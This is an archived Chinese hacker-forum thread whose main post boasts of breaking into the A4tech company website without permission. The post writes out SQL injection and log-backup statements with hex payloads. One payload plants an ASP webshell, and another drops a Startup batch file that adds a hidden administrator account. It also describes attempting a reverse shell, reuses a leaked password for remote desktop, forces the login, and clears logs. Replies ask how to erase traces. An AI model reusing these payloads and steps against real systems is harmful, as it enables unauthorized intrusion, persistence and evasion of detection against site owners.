【3.A.S.T】网络安全爱好者's Archiver

黑客学习

柔肠寸断 发表于 2009-7-17 22:05

渗透双飞燕官方网

[font=宋体, Verdana, Arial, Helvetica, sans-serif][size=14px]本文已发表在《黑客X档案》第10期,转载请表明出处。
一.师出有名
  放假在家闲着没事,就常常上浩方玩魔兽消遣。结果不到半个月鼠标就被我搞挂了……没办法就去买了个双飞燕的鼠标。用起来手感还不错,打了几场胜仗,呵呵。趁着这股兴奋劲还没过,我就顺便对双飞燕的官方网做了一下安全检测。
二.充满希望的开始
在google上搜索关键字:双飞燕官方网,很快就出来了一大堆相关网站。找到主页点击进入[url=http://www.a4tech.com/][color=#800080]http://www.a4tech.com/[/color][/url]界面做的还不错,随便点开几个页面,找到了可以利用的之后在URL后面加了个单引号,看到了如图一的错误提示
图一[url=http://ww.hack58.com/Article/UploadPic/2009-2/20092260461401.jpg][img]http://ww.hack58.com/Article/UploadPic/2009-2/20092260461401.jpg[/img][/url]
看来是做了防注入处理。不急,先在网站里逛逛再说。
随便逛了下,在网站里我看到了一幅网站地图,如图二。
图二[url=http://ww.hack58.com/Article/UploadPic/2009-2/20092260461380.jpg][img]http://ww.hack58.com/Article/UploadPic/2009-2/20092260461380.jpg[/img][/url]
原来双飞燕在其他国家也有对应语言的分站,我就随便点开了日本分站。这回成功找到了一个注入点,丢进啊D里检测出来的权限是DBOWNER。如图三。
图三[url=http://ww.hack58.com/Article/UploadPic/2009-2/20092260461720.jpg][img]http://ww.hack58.com/Article/UploadPic/2009-2/20092260461720.jpg[/img][/url]
然后用啊D的列目录功能很快就找到了网站的根目录,如图四:
图四
[url=http://ww.hack58.com/Article/UploadPic/2009-2/20092260461189.jpg][img]http://ww.hack58.com/Article/UploadPic/2009-2/20092260461189.jpg[/img][/url]
我尝试用啊D直接上传我的一句话小马,结果失败了,提示是找不到该页面;然后我用HDSI, NBSI等工具上传都没有成功。唉,工具还是靠不住啊~~~看来还得自己动手利用log备份了。备份语句为:
;alter database A4tech_JPN set RECOVERY FULL--
;create table cmd (a image)--
;backup log A4tech_JPN to disk =’d:\Web\a4tech\’ with init--
;insert into cmd (a) values                              
(0x 60256578656375746520726571756573742822232229253E)--
;backup log A4tech_JPN to disk = ‘d:\Web\a4tech\aspps.asp’ --
;drop table cmd --
然后打开[url=http://www.a4tech.com/aspps.asp][color=#0000ff]http://www.a4tech.com/aspps.asp[/color][/url] 在一大堆乱码如瀑布一样流下之后,我看到了熟悉的错误提示,如图五:
图五[url=http://ww.hack58.com/Article/UploadPic/2009-2/20092260461245.jpg][img]http://ww.hack58.com/Article/UploadPic/2009-2/20092260461245.jpg[/img][/url]
用海阳一句话客户端连接上去,成功得到了webshell。然后我习惯性的传了个功能比较强的大马上去,没想到大马上传上去之后一访问就会出错,搞了很久也不知原因所在。还望高手指点。没办法,只好先凑合着用海阳一句话了。
三.令人郁闷的继续
在webshell里逛了一下,发现权限还过得去:能上传,能执行cmd,能浏览其他盘,支持aspx,可写目录貌似只有网站的根目录。既然支持aspx,我立刻传了个aspx的马上去,在aspx的webshell里尝试往c盘上传文件,可还是失败了。我又上传了个nc,想反弹一个user权限的shell回来,没想到怎么弹都弹不回来,郁闷了……
回到我的webshell,想找网站的数据库连接文件看看能不能弄到SA的用户密码,可是找了半天没找着,加上网速又卡得不行,无奈只好先行放弃;进入C:\Program Files\目录下看看有没有什么可利用的第三方软件。可是结果依然在打击着我:不但没有可利用的软件,我看到了服务器上还安装了卡巴斯基。难怪nc弹不回来,估计是被卡巴干掉了。
这时我想到了差异备份提权的方法,因为[url=http://www.hack58.net/][color=#0000ff]windows[/color][/url]服务器版的操作系统对于DBOWNER权限下在  C:\Documents and Settings\All Users\「开始」菜单\程序\启动\   这个目录是具有写权限的。首先我试着连接服务器的3389,可以连接。于是我就尝试备份一个添加用户的批处理到启动项。这时候我们用字符转换工具把我们的加用户语句转化为16进制,如图六:
图六[url=http://ww.hack58.com/Article/UploadPic/2009-2/20092260462147.jpg][img]http://ww.hack58.com/Article/UploadPic/2009-2/20092260462147.jpg[/img][/url]
记得在转换后的代码前面加上一个0x,接下来就是我们的差异备份语句了。和备份拿webshell的过程一样,只不过第四和第五步的代码要改为
;insert into cmd (a) values                              
(0x 646563686F206F66660D0A6E657420757365722066617573742420313233343536202F6164640D0A6E6574206C6F63616C67726F75702061646D696E6973747261746F727320666175737424202F616464)—
;backup log A4tech_JPN to disk = C:\Documents and Settings\All Users\Start Menu\Programs\Startup\faust.bat’ --

然后在webshell里看到启动项中多了faust.bat这个批处理,接下来只要服务器重启,就添加了faust$这个隶属于管理员组的账号了。
经过了漫长的等待……服务器还是没有重启!!!都三周过去了,估计唐僧的耐心也会耗尽了=。=不行,要速战速决!我直接连上3389想碰下运气,试了5次shift和win+u看看有没有前辈留下的后门,可事实是残酷的……看来投机取巧之举还是行不通啊。
四.峰回路转
没办法再次回到我的webshell继续搜索有用信息,看了下“系统用户及用户组信息”,发现这个服务器上的用户还真多!
突然间我发现这里的用户除了默认的用户之外,其余的似乎都对应着一个网站。权限大多也不一样。然后这时我看到了一个很奇怪的用户,如图七:
图七[url=http://ww.hack58.com/Article/UploadPic/2009-2/20092260462611.jpg][img]http://ww.hack58.com/Article/UploadPic/2009-2/20092260462611.jpg[/img][/url]
这个用户没有对应任何网站,而且用户描述也很奇怪。yuhong!@#  这算是什么描述啊?此时我突发奇想,也许这串奇怪的字符就是这个管理员的密码也说不定!我抱着怀疑的态度用这个账号密码登陆了服务器的3389。然而返回的提示却让我兴奋不已:终端超过了最大允许连!如图八:
图八[url=http://ww.hack58.com/Article/UploadPic/2009-2/20092260462134.jpg][img]http://ww.hack58.com/Article/UploadPic/2009-2/20092260462134.jpg[/img][/url]

哈哈!这就意味着用户密码是正确的!人品爆发了运气真好啊!也不知道管理员怎么想的,记不住密码也不至于把密码写在脸上吧!终端超过最大允许连这点小问题难不倒我,利用一个强制登陆3389的小工具就行了,成功登陆了服务器的3389。如图九:
图九[url=http://ww.hack58.com/Article/UploadPic/2009-2/20092260462143.jpg][img]http://ww.hack58.com/Article/UploadPic/2009-2/20092260462143.jpg[/img][/url]
五.尾声
最后就是打扫战场清理日志后走人。至此,本次入侵就顺利结束了,没有什么技术含量,7分靠运气。最后总结一下就是我们平时在入侵的时候,一些看起来很薄弱的漏洞倒不一定是成功的关键,因为后来我回想了一下,虽然启动项里的那个加用户的批处理也可以进行提权,可是缺点是它在运行的时候会弹出一个黑框,容易引起管理员注意,这样一来就功亏一篑了;而用下载者的话又会被卡巴杀掉,同样是徒劳。所以我们需要的是相对而言比较保险的方法,当时我可以把提权的bat换成相同功能的vbs放到启动项里,但是由于时间有限所以我就没有那么做了。另外还有在入侵的时候不要轻易放过任何一个微小的地方,有些时候这些不太引人注意的地方往往就是成功的突破口。
[/size][/font]

邪天龙寒 发表于 2009-7-18 00:26

不错啊,RP爆发,小菜学习了

394931603 发表于 2009-7-18 08:55

[b] [url=http://www.3ast.com.cn/redirect.php?goto=findpost&pid=49106&ptid=9592]1#[/url] [i]柔肠寸断[/i] [/b]


你的文章都挺不错啊
但是好多都是最后清理下脚印走人
这个清理下脚印走人——总是一略而过
偶是小菜想知道高手具体是怎么清理脚印的?
网上虽然有很多工具。。。但是没试验过。
也不太会用
希望能给个小教程……
或许小菜们都是这么想的……

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.